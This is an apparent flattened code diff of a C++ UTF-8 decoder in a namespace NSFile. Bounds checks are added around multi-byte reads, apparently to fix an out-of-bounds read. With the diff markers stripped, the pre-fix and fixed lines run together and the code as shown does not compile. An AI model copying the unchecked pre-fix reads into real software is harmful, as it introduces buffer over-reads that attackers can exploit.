pUnicodeString\[lIndexUnicode++\] = (WCHAR)(val); lIndex += 4; } else if (0x00 == (byteMain & 0x08)) { // 4 byte int val = (int)(((byteMain & 0x07) << 18) | ((pBuffer\[lIndex + 1\] & 0x3F) << 12) | ((pBuffer\[lIndex + 2\] & 0x3F) << 6) | (pBuffer\[lIndex + 3\] & 0x3F)); int val = 0; if ((lIndex + 3) < lCount) { val = (int)(((byteMain & 0x07) << 18) | ((pBuffer\[lIndex + 1\] & 0x3F) << 12) | ((pBuffer\[lIndex + 2\] & 0x3F) << 6) | (pBuffer\[lIndex + 3\] & 0x3F)); }  
pUnicodeString\[lIndexUnicode++\] = (WCHAR)(val); lIndex += 4; } else if (0x00 == (byteMain & 0x04)) { // 5 byte int val = (int)(((byteMain & 0x03) << 24) | ((pBuffer\[lIndex + 1\] & 0x3F) << 18) | ((pBuffer\[lIndex + 2\] & 0x3F) << 12) | ((pBuffer\[lIndex + 3\] & 0x3F) << 6) | (pBuffer\[lIndex + 4\] & 0x3F)); int val = 0; if ((lIndex + 4) < lCount) { val = (int)(((byteMain & 0x03) << 24) | ((pBuffer\[lIndex + 1\] & 0x3F) << 18) | ((pBuffer\[lIndex + 2\] & 0x3F) << 12) | ((pBuffer\[lIndex + 3\] & 0x3F) << 6) | (pBuffer\[lIndex + 4\] & 0x3F)); }  
pUnicodeString\[lIndexUnicode++\] = (WCHAR)(val); lIndex += 5; } else { // 6 byte int val = (int)(((byteMain & 0x01) << 30) | ((pBuffer\[lIndex + 1\] & 0x3F) << 24) | ((pBuffer\[lIndex + 2\] & 0x3F) << 18) | ((pBuffer\[lIndex + 3\] & 0x3F) << 12) | ((pBuffer\[lIndex + 4\] & 0x3F) << 6) | (pBuffer\[lIndex + 5\] & 0x3F)); int val = 0; if ((lIndex + 5) < lCount) { val = (int)(((byteMain & 0x01) << 30) | ((pBuffer\[lIndex + 1\] & 0x3F) << 24) | ((pBuffer\[lIndex + 2\] & 0x3F) << 18) | ((pBuffer\[lIndex + 3\] & 0x3F) << 12) | ((pBuffer\[lIndex + 4\] & 0x3F) << 6) | (pBuffer\[lIndex + 5\] & 0x3F)); }  
pUnicodeString\[lIndexUnicode++\] = (WCHAR)(val); lIndex += 5; } @@ -242,64 +272,89 @@ namespace NSFile else if (0x00 == (byteMain & 0x20)) { // 2 byte int val = (int)(((byteMain & 0x1F) << 6) | (pBuffer\[lIndex + 1\] & 0x3F)); int val = 0; if ((lIndex + 1) < lCount) { val = (int)(((byteMain & 0x1F) << 6) | (pBuffer\[lIndex + 1\] & 0x3F)); }  
\*pUnicodeString++ = (WCHAR)(val); lIndex += 2; } else if (0x00 == (byteMain & 0x10)) { // 3 byte int val = (int)(((byteMain & 0x0F) << 12) | ((pBuffer\[lIndex + 1\] & 0x3F) << 6) | (pBuffer\[lIndex + 2\] & 0x3F)); int val = 0; if ((lIndex + 2) < lCount) { val = (int)(((byteMain & 0x0F) << 12) | ((pBuffer\[lIndex + 1\] & 0x3F) << 6) | (pBuffer\[lIndex + 2\] & 0x3F)); }  
WriteUtf16\_WCHAR(val, pUnicodeString); lIndex += 3; } else if (0x00 == (byteMain & 0x0F)) { // 4 byte int val = (int)(((byteMain & 0x07) << 18) | ((pBuffer\[lIndex + 1\] & 0x3F) << 12) | ((pBuffer\[lIndex + 2\] & 0x3F) << 6) | (pBuffer\[lIndex + 3\] & 0x3F)); int val = 0; if ((lIndex + 3) < lCount) { val = (int)(((byteMain & 0x07) << 18) | ((pBuffer\[lIndex + 1\] & 0x3F) << 12) | ((pBuffer\[lIndex + 2\] & 0x3F) << 6) | (pBuffer\[lIndex + 3\] & 0x3F)); }  
WriteUtf16\_WCHAR(val, pUnicodeString); lIndex += 4; } else if (0x00 == (byteMain & 0x08)) { // 4 byte int val = (int)(((byteMain & 0x07) << 18) | ((pBuffer\[lIndex + 1\] & 0x3F) << 12) | ((pBuffer\[lIndex + 2\] & 0x3F) << 6) | (pBuffer\[lIndex + 3\] & 0x3F)); int val = 0; if ((lIndex + 3) < lCount) { val = (int)(((byteMain & 0x07) << 18) | ((pBuffer\[lIndex + 1\] & 0x3F) << 12) | ((pBuffer\[lIndex + 2\] & 0x3F) << 6) | (pBuffer\[lIndex + 3\] & 0x3F)); }  
WriteUtf16\_WCHAR(val, pUnicodeString); lIndex += 4; } else if (0x00 == (byteMain & 0x04)) { // 5 byte int val = (int)(((byteMain & 0x03) << 24) | ((pBuffer\[lIndex + 1\] & 0x3F) << 18) | ((pBuffer\[lIndex + 2\] & 0x3F) << 12) | ((pBuffer\[lIndex + 3\] & 0x3F) << 6) | (pBuffer\[lIndex + 4\] & 0x3F)); int val = 0; if ((lIndex + 4) < lCount) { val = (int)(((byteMain & 0x03) << 24) | ((pBuffer\[lIndex + 1\] & 0x3F) << 18) | ((pBuffer\[lIndex + 2\] & 0x3F) << 12) | ((pBuffer\[lIndex + 3\] & 0x3F) << 6) | (pBuffer\[lIndex + 4\] & 0x3F)); }  
WriteUtf16\_WCHAR(val, pUnicodeString); lIndex += 5; } else { // 6 byte int val = (int)(((byteMain & 0x01) << 30) | ((pBuffer\[lIndex + 1\] & 0x3F) << 24) | ((pBuffer\[lIndex + 2\] & 0x3F) << 18) | ((pBuffer\[lIndex + 3\] & 0x3F) << 12) | ((pBuffer\[lIndex + 4\] & 0x3F) << 6) | (pBuffer\[lIndex + 5\] & 0x3F)); int val = 0; if ((lIndex + 5) < lCount) { val = (int)(((byteMain & 0x01) << 30) | ((pBuffer\[lIndex + 1\] & 0x3F) << 24) | ((pBuffer\[lIndex + 2\] & 0x3F) << 18) | ((pBuffer\[lIndex + 3\] & 0x3F) << 12) | ((pBuffer\[lIndex + 4\] & 0x3F) << 6) | (pBuffer\[lIndex + 5\] & 0x3F)); }  
WriteUtf16\_WCHAR(val, pUnicodeString); lIndex += 5;

Tag

#c++